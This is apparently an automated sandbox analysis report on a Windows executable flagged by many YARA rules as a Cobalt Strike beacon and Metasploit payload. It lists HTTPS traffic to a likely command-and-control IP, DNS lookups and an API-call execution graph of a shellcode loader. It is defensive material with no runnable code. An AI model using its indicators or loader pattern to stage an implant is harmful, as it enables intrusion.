                Jan 5, 2025 23:03:57.852164030 CET603724436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.852168083 CET443660372103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:57.852214098 CET603724436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.852374077 CET603724436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.852391958 CET603724436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.857177973 CET443660372103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:57.857933044 CET603724436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.968020916 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.972948074 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:57.975549936 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.975792885 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:57.980601072 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:58.856384993 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:58.858002901 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.114797115 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.114855051 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.115183115 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.116353035 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.119955063 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.121263027 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.634938955 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.635083914 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.635210037 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.635409117 CET603734436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.640166044 CET443660373103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.749098063 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.753968954 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:03:59.755537033 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.755745888 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:03:59.760548115 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:00.643132925 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:00.643548012 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:00.907713890 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:00.911554098 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.182034016 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.184978008 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.186790943 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:01.189733982 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:01.698339939 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:01.698396921 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.698438883 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:01.698487043 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.698627949 CET603744436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.703367949 CET443660374103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:01.811708927 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.816911936 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:01.817001104 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.817226887 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:01.822025061 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:02.680437088 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:02.680495024 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:02.940757990 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:02.943563938 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:02.943876028 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:02.945014000 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:02.948607922 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:02.949768066 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:03.467637062 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:03.467703104 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:03.467818022 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:03.468144894 CET603754436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:03.472882986 CET443660375103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:03.577164888 CET603764436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:03.582007885 CET443660376103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:03.583565950 CET603764436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:03.583745956 CET603764436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:03.588495970 CET443660376103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:04.460472107 CET443660376103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:04.460530043 CET603764436192.168.2.4103.19.190.184
                Jan 5, 2025 23:04:04.722882986 CET443660376103.19.190.184192.168.2.4
                Jan 5, 2025 23:04:04.722994089 CET603764436192.168.2.4103.19.190.184
                TimestampSource PortDest PortSource IPDest IP
                Jan 5, 2025 23:02:19.036746979 CET53573081.1.1.1192.168.2.4
                Jan 5, 2025 23:02:20.489938021 CET53497561.1.1.1192.168.2.4
                Jan 5, 2025 23:02:22.575628996 CET6215053192.168.2.41.1.1.1
                Jan 5, 2025 23:02:22.586031914 CET53621501.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 5, 2025 23:02:22.575628996 CET192.168.2.41.1.1.10x361aStandard query (0)212.20.149.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 5, 2025 23:02:00.196707964 CET1.1.1.1192.168.2.40x24bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                Jan 5, 2025 23:02:00.196707964 CET1.1.1.1192.168.2.40x24bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                Jan 5, 2025 23:02:22.586031914 CET1.1.1.1192.168.2.40x361aName error (3)212.20.149.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                Click to jump to process

                Click to jump to process

                Target ID:0
                Start time:17:01:56
                Start date:05/01/2025
                Path:C:\Users\user\Desktop\JP1KbvjWcM.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\JP1KbvjWcM.exe"
                Imagebase:0x7ff65b3b0000
                File size:216'576 bytes
                MD5 hash:553AB6275AE084F4587840C55A7A2EEB
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:false

                Reset < >

                  Execution Graph

                  Execution Coverage:1.6%
                  Dynamic/Decrypted Code Coverage:81.8%
                  Signature Coverage:10.9%
                  Total number of Nodes:329
                  Total number of Limit Nodes:14
                  execution_graph 35171 7ff65b3b13d0 35174 7ff65b3b1180 35171->35174 35173 7ff65b3b13e6 35175 7ff65b3b11b0 35174->35175 35176 7ff65b3b11b9 Sleep 35175->35176 35177 7ff65b3b11cd 35175->35177 35176->35175 35178 7ff65b3b1200 35177->35178 35179 7ff65b3b134c _initterm 35177->35179 35188 7ff65b3b12ee 35177->35188 35189 7ff65b3b1cb0 35178->35189 35179->35178 35181 7ff65b3b1228 SetUnhandledExceptionFilter 35182 7ff65b3b124b 35181->35182 35183 7ff65b3b1250 malloc 35182->35183 35184 7ff65b3b127a 35183->35184 35183->35188 35185 7ff65b3b1280 strlen malloc memcpy 35184->35185 35185->35185 35186 7ff65b3b12b2 35185->35186 35211 7ff65b3b7e50 35186->35211 35188->35173 35191 7ff65b3b1ce8 35189->35191 35210 7ff65b3b1cd1 35189->35210 35190 7ff65b3b1fc0 35193 7ff65b3b1fc9 35190->35193 35190->35210 35191->35190 35192 7ff65b3b1ede 35191->35192 35204 7ff65b3b1d62 35191->35204 35191->35210 35196 7ff65b3b1fed 35192->35196 35200 7ff65b3b1ef9 35192->35200 35193->35196 35215 7ff65b3b1b40 8 API calls 35193->35215 35195 7ff65b3b1ffe 35217 7ff65b3b1ad0 8 API calls 35195->35217 35216 7ff65b3b1ad0 8 API calls 35196->35216 35199 7ff65b3b200a 35199->35181 35202 7ff65b3b1f0a 35200->35202 35202->35200 35203 7ff65b3b1b40 8 API calls 35202->35203 35214 7ff65b3b1ad0 8 API calls 35202->35214 35203->35202 35204->35192 35204->35195 35204->35196 35204->35200 35204->35202 35205 7ff65b3b1dc0 35204->35205 35204->35210 35205->35202 35205->35204 35206 7ff65b3b1b40 8 API calls 35205->35206 35207 7ff65b3b1e68 35205->35207 35208 7ff65b3b1e70 35205->35208 35206->35205 35207->35208 35209 7ff65b3b1ea2 VirtualProtect 35208->35209 35208->35210 35209->35208 35210->35181 35212 7ff65b3b7e5b 35211->35212 35213 7ff65b3b7e70 GetCurrentProcess WaitForSingleObject 35212->35213 35213->35213 35214->35202 35215->35193 35216->35195 35217->35199 35218 265b207891b 35219 265b20789a8 35218->35219 35222 265b207936b 35219->35222 35221 265b2078a48 35225 265b20793a5 35222->35225 35223 265b207949c VirtualAlloc 35224 265b20794c0 35223->35224 35224->35221 35225->35223 35225->35224 35226 265b022098b HttpOpenRequestA 35227 265b02209b2 35226->35227 35228 265b0220b91 VirtualAlloc 35227->35228 35229 265b0220bb4 InternetReadFile 35227->35229 35230 265b0220bdd 35227->35230 35228->35229 35229->35227 35231 7ff65b3b16a9 malloc 35232 7ff65b3b16d6 SleepEx 35231->35232 35238 7ff65b3b161a 35232->35238 35235 7ff65b3b16ef 35243 7ff65b3b1485 HeapCreate HeapAlloc 35235->35243 35237 7ff65b3b16fe 35239 7ff65b3b1646 GetMailslotInfo 35238->35239 35240 7ff65b3b1665 35239->35240 35241 7ff65b3b1697 35239->35241 35240->35241 35242 7ff65b3b1673 ReadFile 35240->35242 35241->35232 35241->35235 35242->35239 35244 7ff65b3b14c0 HeapReAlloc 35243->35244 35245 7ff65b3b14d1 35243->35245 35244->35245 35246 7ff65b3b14ff CreateThread 35245->35246 35246->35237 35247 265b0220b5e 35250 265b0220b0c 35247->35250 35248 265b0220b91 VirtualAlloc 35249 265b0220bb4 InternetReadFile 35248->35249 35249->35250 35250->35247 35250->35248 35250->35249 35251 265b0220bdd 35250->35251 35252 7ff65b3b15fc 35255 7ff65b3b1550 CreateFileA 35252->35255 35256 7ff65b3b15f1 35255->35256 35257 7ff65b3b159a 35255->35257 35258 7ff65b3b15d0 CloseHandle 35257->35258 35259 7ff65b3b15ae WriteFile 35257->35259 35258->35256 35259->35258 35260 7ff65b3b15db Sleep SleepEx 35259->35260 35260->35256 35261 265b02202e1 35264 265b0220932 35261->35264 35265 265b022093f LoadLibraryA InternetOpenA 35264->35265 35266 265b02209ff 35265->35266 35267 265b01c1b48 35268 265b01c1b64 35267->35268 35270 265b01c1b69 35267->35270 35281 265b01c92d0 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 35268->35281 35271 265b01c1bf4 35270->35271 35279 265b01c1bbe 35270->35279 35282 265b01c19e8 119 API calls 16 library calls 35270->35282 35271->35279 35283 265b01b93e0 35271->35283 35273 265b01c1c12 35274 265b01c1c3b 35273->35274 35276 265b01b93e0 _DllMainCRTStartup 207 API calls 35273->35276 35274->35279 35299 265b01c19e8 119 API calls 16 library calls 35274->35299 35278 265b01c1c2e 35276->35278 35298 265b01c19e8 119 API calls 16 library calls 35278->35298 35281->35270 35282->35271 35284 265b01b94bb 35283->35284 35287 265b01b9402 _DllMainCRTStartup 35283->35287 35367 265b01bb47c 35284->35367 35286 265b01b9407 _DllMainCRTStartup 35286->35273 35287->35286 35288 265b01b9465 _DllMainCRTStartup 35287->35288 35381 265b01bd4d8 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 35287->35381 35300 265b01aca74 35288->35300 35291 265b01b9448 35291->35288 35292 265b01b949f 35291->35292 35293 265b01b9457 35291->35293 35292->35288 35384 265b01bd134 GetCurrentProcess GetCurrentProcess _DllMainCRTStartup 35292->35384 35293->35288 35382 265b01bd2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 35293->35382 35296 265b01b9487 35296->35288 35383 265b01bd2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 35296->35383 35298->35274 35299->35279 35385 265b01b5fec 35300->35385 35302 265b01aca92 _DllMainCRTStartup 35392 265b01bf284 35302->35392 35304 265b01acb40 _DllMainCRTStartup 35409 265b01bc230 35304->35409 35310 265b01acbb5 35311 265b01beaa8 _DllMainCRTStartup 42 API calls 35310->35311 35312 265b01acbcf 35311->35312 35434 265b01af3c0 35312->35434 35315 265b01acbd8 35496 265b01bda74 23 API calls _DllMainCRTStartup 35315->35496 35317 265b01acbdd _DllMainCRTStartup 35318 265b01acbf4 35317->35318 35319 265b01acbf9 35317->35319 35497 265b01bda74 23 API calls _DllMainCRTStartup 35318->35497 35439 265b01af1f8 35319->35439 35323 265b01acc0e 35445 265b01af274 35323->35445 35324 265b01acc09 35498 265b01bda74 23 API calls _DllMainCRTStartup 35324->35498 35328 265b01acc17 35499 265b01bda74 23 API calls _DllMainCRTStartup 35328->35499 35330 265b01acc1c _DllMainCRTStartup 35331 265b01bf284 malloc 39 API calls 35330->35331 35332 265b01acc4f 35331->35332 35333 265b01acc57 35332->35333 35334 265b01acc5c _DllMainCRTStartup 35332->35334 35500 265b01bda74 23 API calls _DllMainCRTStartup 35333->35500 35336 265b01beaa8 _DllMainCRTStartup 42 API calls 35334->35336 35337 265b01acc78 _DllMainCRTStartup 35336->35337 35457 265b01b5c60 GetACP 35337->35457 35368 265b01b5fec _DllMainCRTStartup 39 API calls 35367->35368 35369 265b01bb4a0 memcpy_s _DllMainCRTStartup 35368->35369 35370 265b01bf284 malloc 39 API calls 35369->35370 35371 265b01bb52d memcpy_s 35370->35371 35372 265b01beaa8 _DllMainCRTStartup 42 API calls 35371->35372 35373 265b01bb55e _DllMainCRTStartup 35372->35373 35375 265b01bb575 memcpy_s _DllMainCRTStartup 35373->35375 35642 265b01af014 35373->35642 35378 265b01bf284 malloc 39 API calls 35375->35378 35379 265b01bb802 35375->35379 35380 265b01beaa8 _DllMainCRTStartup 42 API calls 35375->35380 35378->35375 35646 265b01b60e0 10 API calls 2 library calls 35379->35646 35380->35375 35381->35291 35382->35296 35383->35288 35384->35288 35386 265b01bf284 malloc 39 API calls 35385->35386 35387 265b01b600d 35386->35387 35388 265b01bf284 malloc 39 API calls 35387->35388 35391 265b01b6015 memcpy_s _DllMainCRTStartup 35387->35391 35389 265b01b6021 35388->35389 35389->35391 35501 265b01bf244 10 API calls 2 library calls 35389->35501 35391->35302 35393 265b01bf318 35392->35393 35406 265b01bf29c 35392->35406 35508 265b01c1db4 DecodePointer 35393->35508 35395 265b01bf2d4 HeapAlloc 35400 265b01bf30d 35395->35400 35395->35406 35396 265b01bf2b4 35396->35395 35502 265b01c1df0 35 API calls 2 library calls 35396->35502 35503 265b01c1e64 35 API calls 6 library calls 35396->35503 35504 265b01bff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 35396->35504 35397 265b01bf31d 35509 265b01c1d18 10 API calls _getptd_noexit 35397->35509 35400->35304 35401 265b01bf2fd 35506 265b01c1d18 10 API calls _getptd_noexit 35401->35506 35405 265b01bf302 35507 265b01c1d18 10 API calls _getptd_noexit 35405->35507 35406->35395 35406->35396 35406->35401 35406->35405 35505 265b01c1db4 DecodePointer 35406->35505 35510 265b01c145c GetSystemTimeAsFileTime 35409->35510 35414 265b01bf284 malloc 39 API calls 35415 265b01bc2a1 memcpy_s 35414->35415 35417 265b01bc30a 35415->35417 35515 265b01c181c 35415->35515 35418 265b01c181c strtok 48 API calls 35417->35418 35419 265b01acb87 35418->35419 35420 265b01b34a0 35419->35420 35421 265b01c145c _time64 GetSystemTimeAsFileTime 35420->35421 35422 265b01b34b3 35421->35422 35423 265b01c044c _DllMainCRTStartup 45 API calls 35422->35423 35424 265b01b34bb _DllMainCRTStartup 35423->35424 35556 265b01b2f5c 35424->35556 35427 265b01beaa8 35428 265b01beafd memcpy_s 35427->35428 35429 265b01beae7 35427->35429 35428->35310 35430 265b01beaf3 35429->35430 35431 265b01beaff 35429->35431 35432 265b01bf284 malloc 39 API calls 35430->35432 35561 265b01c1914 42 API calls 5 library calls 35431->35561 35432->35428 35435 265b01af3d4 _DllMainCRTStartup 35434->35435 35436 265b01acbd4 35435->35436 35437 265b01af3da GetLocalTime 35435->35437 35436->35315 35436->35317 35438 265b01af408 _DllMainCRTStartup 35437->35438 35438->35436 35440 265b01af20e _DllMainCRTStartup 35439->35440 35441 265b01acc05 35440->35441 35562 265b01ba8dc 64 API calls _DllMainCRTStartup 35440->35562 35441->35323 35441->35324 35443 265b01af248 35563 265b01ba914 64 API calls 3 library calls 35443->35563 35447 265b01af299 _DllMainCRTStartup 35445->35447 35446 265b01acc13 35446->35328 35446->35330 35447->35446 35448 265b01af2eb htonl htonl 35447->35448 35448->35446 35449 265b01af30b 35448->35449 35450 265b01bf284 malloc 39 API calls 35449->35450 35452 265b01af315 memcpy_s _DllMainCRTStartup 35450->35452 35451 265b01af36b memcpy_s 35566 265b01bf244 10 API calls 2 library calls 35451->35566 35452->35451 35564 265b01ba8dc 64 API calls _DllMainCRTStartup 35452->35564 35454 265b01af34c 35565 265b01ba914 64 API calls 3 library calls 35454->35565 35458 265b01b5c88 getSystemCP 35457->35458 35567 265b01a1218 35458->35567 35462 265b01b5ca8 __security_init_cookie 35463 265b01b5cae GetTickCount 35462->35463 35464 265b01c044c _DllMainCRTStartup 45 API calls 35463->35464 35465 265b01b5cbf 35464->35465 35573 265b01acfa4 CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime _DllMainCRTStartup 35465->35573 35467 265b01b5cc4 _DllMainCRTStartup 35468 265b01b5cfe 35467->35468 35469 265b01b5cec GetCurrentProcess 35467->35469 35574 265b01bdec8 CheckTokenMembership FreeSid _DllMainCRTStartup 35468->35574 35609 265b01b0c64 GetModuleHandleA GetProcAddress 35469->35609 35471 265b01b5cfa 35471->35468 35473 265b01b5d06 35575 265b01ae2a8 htonl htonl 35473->35575 35475 265b01b5d1c 35576 265b01ae200 htonl memcpy_s 35475->35576 35477 265b01b5d2f 35577 265b01ae200 htonl memcpy_s 35477->35577 35479 265b01b5d3f 35578 265b01ae200 htonl memcpy_s 35479->35578 35481 265b01b5d4f 35579 265b01ae248 htonl htonl _DllMainCRTStartup 35481->35579 35483 265b01b5d5e __security_init_cookie 35580 265b01ae248 htonl htonl _DllMainCRTStartup 35483->35580 35485 265b01b5d6f 35581 265b01ae278 htonl _DllMainCRTStartup 35485->35581 35487 265b01b5d7a 35582 265b01ae1e0 htonl _DllMainCRTStartup 35487->35582 35489 265b01b5d85 35583 265b01b5e28 35489->35583 35501->35391 35502->35396 35503->35396 35505->35406 35506->35405 35507->35400 35508->35397 35509->35400 35511 265b01bc259 35510->35511 35512 265b01c044c 35511->35512 35524 265b01c5844 35512->35524 35516 265b01c5844 _getptd 45 API calls 35515->35516 35517 265b01c1840 35516->35517 35518 265b01c190e 35517->35518 35521 265b01c1861 35517->35521 35554 265b01c8c50 RtlCaptureContext RtlLookupFunctionEntry IsProcessorFeaturePresent __report_securityfailure 35518->35554 35520 265b01c1913 35547 265b01c7e20 35521->35547 35523 265b01c1903 35523->35415 35529 265b01c5868 GetLastError 35524->35529 35526 265b01c584f 35527 265b01bc261 35526->35527 35543 265b01c00b4 45 API calls 3 library calls 35526->35543 35527->35414 35544 265b01c40a8 35529->35544 35531 265b01c5885 35532 265b01c58d4 SetLastError 35531->35532 35533 265b01c588d 35531->35533 35532->35526 35534 265b01c4728 _calloc_crt 7 API calls 35533->35534 35535 265b01c589a 35534->35535 35535->35532 35536 265b01c40c4 _getptd_noexit TlsSetValue 35535->35536 35537 265b01c58b0 35536->35537 35538 265b01c58cd 35537->35538 35540 265b01c58b7 _initptd 35537->35540 35539 265b01bf244 free 7 API calls 35538->35539 35541 265b01c58d2 35539->35541 35542 265b01c58be GetCurrentThreadId 35540->35542 35541->35532 35542->35532 35545 265b01c40bb TlsGetValue 35544->35545 35546 265b01c40b8 35544->35546 35546->35545 35548 265b01c7e29 35547->35548 35549 265b01c7e34 35548->35549 35550 265b01c8b7c IsProcessorFeaturePresent 35548->35550 35549->35523 35551 265b01c8b93 35550->35551 35555 265b01c3ffc RtlCaptureContext RtlLookupFunctionEntry __crtCapturePreviousContext 35551->35555 35553 265b01c8ba6 __raise_securityfailure 35553->35523 35554->35520 35555->35553 35557 265b01acb94 35556->35557 35560 265b01b2f87 _DllMainCRTStartup 35556->35560 35557->35427 35558 265b01bf284 malloc 39 API calls 35558->35560 35559 265b01beaa8 _DllMainCRTStartup 42 API calls 35559->35560 35560->35557 35560->35558 35560->35559 35561->35428 35562->35443 35563->35441 35564->35454 35565->35451 35566->35446 35612 265b01a1184 CryptAcquireContextA 35567->35612 35570 265b01a1245 35572 265b01bb0b4 39 API calls _DllMainCRTStartup 35570->35572 35572->35462 35573->35467 35574->35473 35575->35475 35576->35477 35577->35479 35578->35481 35579->35483 35580->35485 35581->35487 35582->35489 35584 265b01b5fec _DllMainCRTStartup 39 API calls 35583->35584 35585 265b01b5e51 _DllMainCRTStartup 35584->35585 35586 265b01b5eb5 _DllMainCRTStartup 35585->35586 35587 265b01b5ecd GetModuleFileNameA 35586->35587 35588 265b01b5ee5 strrchr _DllMainCRTStartup 35587->35588 35618 265b01ae1e0 htonl _DllMainCRTStartup 35588->35618 35590 265b01b5f2c 35619 265b01ae1e0 htonl _DllMainCRTStartup 35590->35619 35592 265b01b5f38 35620 265b01ae278 htonl _DllMainCRTStartup 35592->35620 35594 265b01b5f45 35621 265b01ae248 htonl htonl _DllMainCRTStartup 35594->35621 35596 265b01b5f58 35622 265b01ae248 htonl htonl _DllMainCRTStartup 35596->35622 35598 265b01b5f66 35623 265b01ae248 htonl htonl _DllMainCRTStartup 35598->35623 35600 265b01b5f74 35624 265b01ae248 htonl htonl _DllMainCRTStartup 35600->35624 35602 265b01b5f7f 35625 265b01bf63c 35602->35625 35606 265b01b5fc5 35637 265b01b60e0 10 API calls 2 library calls 35606->35637 35609->35471 35613 265b01a11c2 CryptAcquireContextA 35612->35613 35616 265b01a11e6 _DllMainCRTStartup 35612->35616 35614 265b01a120c 35613->35614 35613->35616 35614->35570 35617 265b01a10d0 GetSystemTimeAsFileTime clock 35614->35617 35615 265b01a11fd CryptReleaseContext 35615->35614 35616->35615 35617->35570 35618->35590 35619->35592 35620->35594 35621->35596 35622->35598 35623->35600 35624->35602 35629 265b01bf66e memcpy_s 35625->35629 35626 265b01bf673 35638 265b01c1d18 10 API calls _getptd_noexit 35626->35638 35628 265b01bf692 35640 265b01c2528 64 API calls 13 library calls 35628->35640 35629->35626 35629->35628 35630 265b01bf678 35639 265b01c2340 DecodePointer _invalid_parameter_noinfo 35630->35639 35633 265b01b5fa0 35636 265b01ae200 htonl memcpy_s 35633->35636 35634 265b01bf6c2 35634->35633 35641 265b01c239c 59 API calls 5 library calls 35634->35641 35636->35606 35638->35630 35639->35633 35640->35634 35641->35633 35643 265b01af02f _DllMainCRTStartup 35642->35643 35644 265b01af058 WSAIoctl 35643->35644 35645 265b01af051 _DllMainCRTStartup 35643->35645 35644->35645 35645->35375

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
